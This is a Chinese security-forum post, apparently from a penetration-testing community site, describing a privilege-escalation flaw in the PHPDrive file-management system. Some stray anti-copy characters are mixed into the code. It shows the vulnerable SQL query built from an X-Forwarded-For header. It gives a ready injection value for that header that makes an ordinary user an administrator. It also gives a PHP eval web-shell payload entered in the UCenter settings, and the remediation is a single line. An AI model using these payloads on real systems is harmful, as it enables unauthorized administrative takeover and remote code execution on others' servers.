中国网络渗透测试联盟

标题: PHPDrive权限提升漏洞 [打印本页]
作者: admin    时间: 2012-12-31 09:18
标题: PHPDrive权限提升漏洞
PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
' N: G; o4 c: z+ Q: x
+ a1 ^/ E. }; Y6 fincludes/user.lib.php
8 T9 }1 _' g- c! d# p# w行87
' G/ d( I- F; N- ^7 t! d' J function get_ip() {' O* }' @: o4 y
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.: X9 D. k) N' M+ `6 F% V
在用户注册与登录 处module/disk/account.lead.php/ X% {3 ?+ t% n- o0 G) H; ?3 N' b
198行
) y3 J0 Z4 Q$ |0 L. q5 O( i, D //更新本次登录IP和时间4 q  P" _( _# B6 P
             $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生5 p  S& h8 l) Z0 R1 G
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
( ~8 r- D5 x0 B5 O6 M实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
1 M, _/ B" n% s5 g! N后台getshell:
) F& N/ V+ G" h9 `/ R. v; n在UCenter设置处,将UC数据库登录名填写为( _5 p( h3 O' r# _! K/ q
' m3 J' ~2 U5 v9 T9 T. G8 S
root’);eval($_POST[DisKill]);?>/*: o1 G# u, K- v7 W) _( X: _' [3 a
可以得到一个shell,位置在 data/uc.data.php
3 t! M! C9 ?6 J) I
( p/ v( w7 Y, Y. q6 n修复:过滤注入
: ^0 x! [+ `: r  |8 [4 M
6 {! s  I' O+ g7 J+ e# y



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2